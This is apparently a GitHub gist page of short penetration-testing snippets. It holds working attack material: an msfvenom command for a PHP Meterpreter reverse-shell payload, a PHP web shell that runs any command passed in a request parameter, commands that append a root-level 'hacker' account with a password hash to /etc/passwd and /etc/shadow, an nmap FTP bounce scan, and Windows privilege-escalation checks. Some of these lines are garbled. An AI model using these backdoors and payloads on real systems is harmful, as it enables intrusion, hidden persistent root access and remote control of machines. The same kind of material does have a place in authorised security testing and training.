adi leveled
leveled
/ meterpreter php payload .sh
Created
October 19, 2016 00:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php | |
| cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php |
leveled
/ adding user manually to etc-passwd.sh
Created
October 19, 2016 00:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo “hacker:x:0:0:A friend:/:/bin/bash” » /etc/passwd | |
| /etc/shadow root@localhost:~# openssl passwd -1 -salt xyz freeworld $1$xyz$A1YZaeEjVGoBzmQpTTBFv1 | |
| echo “hacker:$1$xyz$A1YZaeEjVGoBzmQpTTBFv1:13529:0:99999:7:::” » |
leveled
/ vsftpd conf.txt
Created
October 19, 2016 00:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Chroot certain users | |
| chroot_local_user=YES | |
| chroot_list_enable=YES | |
| chroot_list_file=/etc/vsftpd.chroot_list | |
| ## Only allow certain users | |
| userlist_enable=YES | |
| userlist_file=/etc/vsftpd.userlist |
leveled
/ change users home directory.sh
Created
October 19, 2016 00:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| usermod -m -d /newhome/username username |
leveled
/ kali apt-get sources (-etc-apt-sources.list).txt
Created
October 19, 2016 00:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 LIVE/INSTALL $ | |
| ## Security updates | |
| deb http://http.kali.org/ /kali main contrib non-free | |
| deb http://http.kali.org/ /wheezy main contrib non-free | |
| deb http://http.kali.org/kali kali-dev main contrib non-free | |
| deb http://http.kali.org/kali kali-dev main/debian-installer | |
| deb-src http://http.kali.org/kali kali-dev main contrib non-free | |
| deb http://http.kali.org/kali kali main contrib non-free | |
| deb http://http.kali.org/kali kali main/debian-installer | |
| deb-src http://http.kali.org/kali kali main contrib non-free |
leveled
/ nmap ftp bounce .php
Created
October 19, 2016 00:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nmap -v -b -P0 <username>:<password>@<ftp_server_address> <address(es)_to_scan> |
leveled
/ php write to file.php
Created
October 19, 2016 00:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $myfile = fopen("newfile.txt", "w") or die("Unable to open file!"); | |
| $txt = "John Doe\n"; | |
| fwrite($myfile, $txt); | |
| $txt = "Jane Doe\n"; | |
| fwrite($myfile, $txt); | |
| fclose($myfile); | |
| ?> |
leveled
/ php backdoor.php
Created
October 19, 2016 00:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(isset($_REQUEST['cmd'])){ | |
| $cmd = ($_REQUEST["cmd"]); | |
| system($cmd); | |
| echo "</pre>$cmd<pre>"; | |
| die; | |
| } | |
| ?> |
leveled
/ query a service for various parameters .txt
Created
October 19, 2016 00:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sc qc upnphost |
leveled
/ check access configurations for any authenticated user in windows .txt
Created
October 19, 2016 00:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| accesschk.exe /accepteula -uwcqv "Authenticated Users" * |